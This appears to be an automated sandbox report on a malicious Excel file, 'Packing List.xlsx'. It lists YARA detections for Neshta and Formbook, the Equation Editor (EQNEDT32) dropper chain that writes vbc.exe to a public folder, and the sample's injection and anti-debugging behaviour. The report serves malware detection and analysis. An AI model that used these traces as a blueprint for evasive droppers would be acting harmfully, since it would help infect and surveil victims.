Source: 6.0.vbc.exe.1c0000.11.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.13.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.15.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.7.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.23.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.17.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.21.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.13.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.25.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.2.vbc.exe.1c0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.21.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.23.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.17.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.11.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.25.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.19.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.15.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.30b0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 5.2.vbc.exe.30b0000.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 6.0.vbc.exe.1c0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.476970202.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.476210300.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.475402924.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.482711816.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.479470505.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.480530429.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000002.488911564.00000000030B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.484429588.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.486527655.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.478490697.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.474755506.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		5_2_004030FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		6_2_004030FB

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004047D3	5_2_004047D3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004061D4	5_2_004061D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_73233070	5_2_73233070
Source: C:\Users\Public\vbc.exe	Code function: 5_2_732330BA	5_2_732330BA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_73235AEE	5_2_73235AEE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_73235AFD	5_2_73235AFD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004047D3	6_2_004047D3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004061D4	6_2_004061D4

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe

Code function: String function: 00402A29 appears 51 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 5_2_73235ECC CreateProcessW,NtQueryInformationProcess,VirtualAllocEx,CreateRemoteThread,SuspendThread,

5_2_73235ECC

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: Packing List.xlsx	Virustotal: Detection: 32%
Source: Packing List.xlsx	ReversingLabs: Detection: 29%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Packing List.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREDD7.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/20@0/1

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00402053 CoCreateInstance,MultiByteToWideChar,

5_2_00402053

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

5_2_00404292

Source: Packing List.xlsx

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: vbc.exe, 00000005.00000003.474355640.000000000F300000.00000004.00000001.sdmp

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsn3BBA.tmp\oxtrp.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2696

Thread sleep time: -420000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405E93 FindFirstFileA,FindClose,	5_2_00405E93
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004054BD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402671 FindFirstFileA,	5_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402671 FindFirstFileA,	6_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405E93 FindFirstFileA,FindClose,	6_2_00405E93
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	6_2_004054BD

Source: vbc.exe, 00000005.00000002.488053406.00000000004E4000.00000004.00000020.sdmp

Anti Debugging:

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\vbc.exe

Code function: 5_2_73233070 lqcuopia,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,

5_2_73233070

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 5_2_732354DA mov eax, dword ptr fs:[00000030h]	5_2_732354DA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_7323581C mov eax, dword ptr fs:[00000030h]	5_2_7323581C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_7323579F mov eax, dword ptr fs:[00000030h]	5_2_7323579F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_732356EE mov eax, dword ptr fs:[00000030h]	5_2_732356EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_732357DE mov eax, dword ptr fs:[00000030h]	5_2_732357DE

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 1C0000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

